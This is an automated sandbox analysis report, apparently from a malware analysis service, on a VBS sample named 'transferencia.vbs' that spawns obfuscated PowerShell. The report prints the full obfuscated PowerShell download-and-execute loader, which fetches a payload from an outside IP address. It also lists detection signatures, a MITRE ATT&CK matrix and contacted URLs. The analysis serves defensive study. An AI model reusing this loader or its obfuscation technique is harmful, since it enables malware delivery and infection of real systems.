      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4682Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5219Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 432Thread sleep time: -5534023222112862s >= -30000sJump to behavior
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: powershell.exe, 00000002.00000002.3350719704.000001BF33154000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Yara detected Powershell download and execute
      Source: Yara matchFile source: amsi64_2448.amsi.csv, type: OTHER
      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2448, type: MEMORYSTR
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Patee Rutsjebaners Pumaernes Charless Topnoteringernes Centimeter #>;$Gyrectomies='Bogman';<#Preremoving monotoni afdelingslgerne Blunderers Fingredes Intwists #>;$Limpid=$host.PrivateData;If ($Limpid) {$Navicert++;}function Opbrugets52($Craftsmaster){$Postnarisnhaust=$Hellenist+$Craftsmaster.Length-$Navicert;for( $Postnaris=4;$Postnaris -lt $Postnarisnhaust;$Postnaris+=5){$Samfundslrers='nonfecund';$Informativ+=$Craftsmaster[$Postnaris];}$Informativ;}function ggepuncherne($Unpopulousness27){ & ($Topographometric) ($Unpopulousness27);}$Postnarisnertion254=Opbrugets52 'TimeMDe eo M kzVulciStillsoc l C aa Hvs/G,or5Hazi.Skak0Skun Grip(AkadWA lei C.nnUdbedOveroPreswBoilsBekj KabeNAntiTCoss Klud1Paul0,ash. Bar0Dest;A te SoftWLigniDytinEpid6.orl4Soda;P.oc VidxCer,6Sona4 nde;Unle Ra.r .rov,idg:Radi1 Med2 Moc1Brss. hon0Mode)F ey SporGMrkve FircMettkChito Tan/ Bl 2Cong0For,1 amm0Hymn0Insp1Skib0Mot,1Ring beblFFkaliHoldrLysbe.errfPicropeerxFrys/M sk1ce t2Unco1Lat . rdi0 Uds ';$billardkugle=Opbrugets52 'Mi rU TalSForhE.linrSelv- egraPediG P aeO.lyns,ggtBete ';$Ugenummer=Opbrugets52 ' An hChubt SertS umpOp,a:Bhmn/ mpe/So.s9Shit1Svas.Bobi1Nv i0Supe9 Sus.Maae2Chlo0 F s.Unde1 Egn6W ve1 Gud/FopdHPuere teas Grit B.teG orbInter jore ilamjordsAvioe DoknD,ta.CentcStonh UdfmHage ';$onymize=Opbrugets52 'Plat>Awap ';$Topographometric=Opbrugets52 'BangIMa mE skuxKalk ';$nonhallucinatory='Selsparks';$Garwin='\Dorgens.Uns';ggepuncherne (Opbrugets52 'bitm$VkstgHootlsyreoInc bK ffaCompl fas:RelaISkrinpreddSerek PetoOecapAntei IndeModirsclei Disn J mg hor=Ivin$ kaseStolnE.duv.err:Gol aSub.pAlvep PredIdena NostDa,sabesp+Unem$sandGTetaaForertr swSwaniLbernCest ');ggepuncherne (Opbrugets52 ' kyl$MolygIllulBetvoOri bSkina SkulOver: jerSSproaSapolO toa ecim rliaAn nnHermdskytr StiiRestnUtt eunre= T.e$.cheUFor g oneCasqnCarou,amlm ModmS.aceBrevrHo s. ompsEvalpFinnlSk.niHudktMagn(Ac,c$ TrioStkinBundy kytm UneiIn.oz Un,eGad )Armi ');ggepuncherne (Opbrugets52 'Kate[OpvuNFrfreCowstSank.EjakS BejeLicerRefivforhiinf.cBreaeA,stP .peoHabii AllnTr vtJermMHa,daTrevn fllaUtengPreaeSl,tr rdt]traw: Ci.: AsySPolleEliac aleucyrtrO,dniLet,tTel,yPersPDirrr Nono C.st.unoo Pr,cKeepoCadrlJudo Hamm=Atta Un.r[ DiaNcop eIndftMile.MammSColoeStuccMentusolbrBog,i Altt rmayAnglPContr udio attt BefoAspacArchoFredlTriaTBragyd rnpti.geM ck] rer:Rej :MuniT Taml BolsKamf1Noci2I.fl ');$Ugenummer=$Salamandrine[0];$Hexactinellid40=(Opbrugets52 'Le a$,ircGTanol jesoSperBCondA Skrlbela:CupoGOrigrGtebuuntiiHemoN onseKor =Poc,NHaece H.mWB.it-cnidOMirabultrjBaroETracCOxaltF,st s nssW.rsyNe,tsByghtMy,ieRubem s c.WaitN.uldeVaret rni.Fa iwBiseeForbbForecAub LveteISu.ee C nN BavT Dec ');ggepuncherne ($Hexactinellid40);ggepuncherne (Opbrugets52 ' S,n$FloaGBe orIntruhawkiZ.opnKonfeGirl.MohaH IsoePseuaMudcdRetseQ.adrArris inn[ Por$Fo dbFr siuklalcomplOut,a xcer .ond utukCharuPilegKos.lTo.ve.nto]Frek=Jump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "<#patee rutsjebaners pumaernes charless topnoteringernes centimeter #>;$gyrectomies='bogman';<#preremoving monotoni afdelingslgerne blunderers fingredes intwists #>;$limpid=$host.privatedata;if ($limpid) {$navicert++;}function opbrugets52($craftsmaster){$postnarisnhaust=$hellenist+$craftsmaster.length-$navicert;for( $postnaris=4;$postnaris -lt $postnarisnhaust;$postnaris+=5){$samfundslrers='nonfecund';$informativ+=$craftsmaster[$postnaris];}$informativ;}function ggepuncherne($unpopulousness27){ & ($topographometric) ($unpopulousness27);}$postnarisnertion254=opbrugets52 'timemde eo m kzvulcistillsoc l c aa hvs/g,or5hazi.skak0skun grip(akadwa lei c.nnudbedoveropreswboilsbekj kabenantitcoss klud1paul0,ash. bar0dest;a te softwlignidytinepid6.orl4soda;p.oc vidxcer,6sona4 nde;unle ra.r .rov,idg:radi1 med2 moc1brss. hon0mode)f ey sporgmrkve fircmettkchito tan/ bl 2cong0for,1 amm0hymn0insp1skib0mot,1ring beblffkaliholdrlysbe.errfpicropeerxfrys/m sk1ce t2unco1lat . rdi0 uds ';$billardkugle=opbrugets52 'mi ru talsforhe.linrselv- egrapedig p aeo.lyns,ggtbete ';$ugenummer=opbrugets52 ' an hchubt serts umpop,a:bhmn/ mpe/so.s9shit1svas.bobi1nv i0supe9 sus.maae2chlo0 f s.unde1 egn6w ve1 gud/fopdhpuere teas grit b.teg orbinter jore ilamjordsavioe doknd,ta.centcstonh udfmhage ';$onymize=opbrugets52 'plat>awap ';$topographometric=opbrugets52 'bangima me skuxkalk ';$nonhallucinatory='selsparks';$garwin='\dorgens.uns';ggepuncherne (opbrugets52 'bitm$vkstghootlsyreoinc bk ffacompl fas:relaiskrinpreddserek petooecapantei indemodirsclei disn j mg hor=ivin$ kasestolne.duv.err:gol asub.palvep predidena nostda,sabesp+unem$sandgtetaaforertr swswanilberncest ');ggepuncherne (opbrugets52 ' kyl$molygillulbetvoori bskina skulover: jerssproasapolo toa ecim rliaan nnhermdskytr stiirestnutt eunre= t.e$.cheufor g onecasqncarou,amlm modms.acebrevrho s. ompsevalpfinnlsk.nihudktmagn(ac,c$ triostkinbundy kytm uneiin.oz un,egad )armi ');ggepuncherne (opbrugets52 'kate[opvunfrfrecowstsank.ejaks bejelicerrefivforhiinf.cbreaea,stp .peohabii allntr vtjermmha,datrevn fllautengpreaesl,tr rdt]traw: ci.: asyspolleeliac aleucyrtro,dnilet,ttel,yperspdirrr nono c.st.unoo pr,ckeepocadrljudo hamm=atta un.r[ diancop eindftmile.mammscoloestuccmentusolbrbog,i altt rmayanglpcontr udio attt befoaspacarchofredltriatbragyd rnpti.gem ck] rer:rej :munit taml bolskamf1noci2i.fl ');$ugenummer=$salamandrine[0];$hexactinellid40=(opbrugets52 'le a$,ircgtanol jesosperbconda skrlbela:cupogorigrgtebuuntiihemon onsekor =poc,nhaece h.mwb.it-cnidomirabultrjbaroetraccoxaltf,st s nssw.rsyne,tsbyghtmy,ierubem s c.waitn.uldevaret rni.fa iwbiseeforbbforecaub lveteisu.ee c nn bavt dec ');ggepuncherne ($hexactinellid40);ggepuncherne (opbrugets52 ' s,n$floagbe orintruhawkiz.opnkonfegirl.mohah isoepseuamudcdretseq.adrarris inn[ por$fo dbfr siuklalcomplout,a xcer .ond utukcharupilegkos.lto.ve.nto]frek=
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "<#patee rutsjebaners pumaernes charless topnoteringernes centimeter #>;$gyrectomies='bogman';<#preremoving monotoni afdelingslgerne blunderers fingredes intwists #>;$limpid=$host.privatedata;if ($limpid) {$navicert++;}function opbrugets52($craftsmaster){$postnarisnhaust=$hellenist+$craftsmaster.length-$navicert;for( $postnaris=4;$postnaris -lt $postnarisnhaust;$postnaris+=5){$samfundslrers='nonfecund';$informativ+=$craftsmaster[$postnaris];}$informativ;}function ggepuncherne($unpopulousness27){ & ($topographometric) ($unpopulousness27);}$postnarisnertion254=opbrugets52 'timemde eo m kzvulcistillsoc l c aa hvs/g,or5hazi.skak0skun grip(akadwa lei c.nnudbedoveropreswboilsbekj kabenantitcoss klud1paul0,ash. bar0dest;a te softwlignidytinepid6.orl4soda;p.oc vidxcer,6sona4 nde;unle ra.r .rov,idg:radi1 med2 moc1brss. hon0mode)f ey sporgmrkve fircmettkchito tan/ bl 2cong0for,1 amm0hymn0insp1skib0mot,1ring beblffkaliholdrlysbe.errfpicropeerxfrys/m sk1ce t2unco1lat . rdi0 uds ';$billardkugle=opbrugets52 'mi ru talsforhe.linrselv- egrapedig p aeo.lyns,ggtbete ';$ugenummer=opbrugets52 ' an hchubt serts umpop,a:bhmn/ mpe/so.s9shit1svas.bobi1nv i0supe9 sus.maae2chlo0 f s.unde1 egn6w ve1 gud/fopdhpuere teas grit b.teg orbinter jore ilamjordsavioe doknd,ta.centcstonh udfmhage ';$onymize=opbrugets52 'plat>awap ';$topographometric=opbrugets52 'bangima me skuxkalk ';$nonhallucinatory='selsparks';$garwin='\dorgens.uns';ggepuncherne (opbrugets52 'bitm$vkstghootlsyreoinc bk ffacompl fas:relaiskrinpreddserek petooecapantei indemodirsclei disn j mg hor=ivin$ kasestolne.duv.err:gol asub.palvep predidena nostda,sabesp+unem$sandgtetaaforertr swswanilberncest ');ggepuncherne (opbrugets52 ' kyl$molygillulbetvoori bskina skulover: jerssproasapolo toa ecim rliaan nnhermdskytr stiirestnutt eunre= t.e$.cheufor g onecasqncarou,amlm modms.acebrevrho s. ompsevalpfinnlsk.nihudktmagn(ac,c$ triostkinbundy kytm uneiin.oz un,egad )armi ');ggepuncherne (opbrugets52 'kate[opvunfrfrecowstsank.ejaks bejelicerrefivforhiinf.cbreaea,stp .peohabii allntr vtjermmha,datrevn fllautengpreaesl,tr rdt]traw: ci.: asyspolleeliac aleucyrtro,dnilet,ttel,yperspdirrr nono c.st.unoo pr,ckeepocadrljudo hamm=atta un.r[ diancop eindftmile.mammscoloestuccmentusolbrbog,i altt rmayanglpcontr udio attt befoaspacarchofredltriatbragyd rnpti.gem ck] rer:rej :munit taml bolskamf1noci2i.fl ');$ugenummer=$salamandrine[0];$hexactinellid40=(opbrugets52 'le a$,ircgtanol jesosperbconda skrlbela:cupogorigrgtebuuntiihemon onsekor =poc,nhaece h.mwb.it-cnidomirabultrjbaroetraccoxaltf,st s nssw.rsyne,tsbyghtmy,ierubem s c.waitn.uldevaret rni.fa iwbiseeforbbforecaub lveteisu.ee c nn bavt dec ');ggepuncherne ($hexactinellid40);ggepuncherne (opbrugets52 ' s,n$floagbe orintruhawkiz.opnkonfegirl.mohah isoepseuamudcdretseq.adrarris inn[ por$fo dbfr siuklalcomplout,a xcer .ond utukcharupilegkos.lto.ve.nto]frek=Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity Information221
      Scripting      		Valid Accounts2
      Command and Scripting Interpreter      		221
      Scripting      		11
      Process Injection      		1
      Masquerading      		OS Credential Dumping1
      Security Software Discovery      		Remote ServicesData from Local System1
      Ingress Tool Transfer      		Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts1
      Exploitation for Client Execution      		1
      DLL Side-Loading      		1
      DLL Side-Loading      		21
      Virtualization/Sandbox Evasion      		LSASS Memory1
      Process Discovery      		Remote Desktop ProtocolData from Removable Media1
      Non-Application Layer Protocol      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain Accounts2
      PowerShell      		Logon Script (Windows)Logon Script (Windows)11
      Process Injection      		Security Account Manager21
      Virtualization/Sandbox Evasion      		SMB/Windows Admin SharesData from Network Shared Drive11
      Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
      Obfuscated Files or Information      		NTDS1
      Application Window Discovery      		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      DLL Side-Loading      		LSA Secrets1
      File and Directory Discovery      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials12
      System Information Discovery      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      transferencia.vbs3%ReversingLabs
      transferencia.vbs15%VirustotalBrowse

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://nuget.org/NuGet.exe0%URL Reputationsafe
      http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
      https://go.micro0%URL Reputationsafe
      https://contoso.com/0%URL Reputationsafe
      https://nuget.org/nuget.exe0%URL Reputationsafe
      https://contoso.com/License0%URL Reputationsafe
      https://contoso.com/Icon0%URL Reputationsafe
      https://aka.ms/pscore680%URL Reputationsafe
      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
      http://91.109.20.161/Hestebremsen.chm1%VirustotalBrowse
      http://www.apache.org/licenses/LICENSE-2.0.html0%VirustotalBrowse
      http://91.109.20.1614%VirustotalBrowse
      https://github.com/Pester/Pester1%VirustotalBrowse

      Domains and IPs

      Contacted Domains

      No contacted domains info

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://91.109.20.161/Hestebremsen.chmfalseunknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.3346421331.000001BF2AC33000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3346421331.000001BF2AAF1000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.3327025092.000001BF1ACB1000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.3327025092.000001BF1ACB1000.00000004.00000800.00020000.00000000.sdmpfalseunknown
      https://go.micropowershell.exe, 00000002.00000002.3327025092.000001BF1B878000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      https://contoso.com/powershell.exe, 00000002.00000002.3346421331.000001BF2AAF1000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.3346421331.000001BF2AC33000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3346421331.000001BF2AAF1000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      https://contoso.com/Licensepowershell.exe, 00000002.00000002.3346421331.000001BF2AAF1000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      https://contoso.com/Iconpowershell.exe, 00000002.00000002.3346421331.000001BF2AAF1000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      https://aka.ms/pscore68powershell.exe, 00000002.00000002.3327025092.000001BF1AA81000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
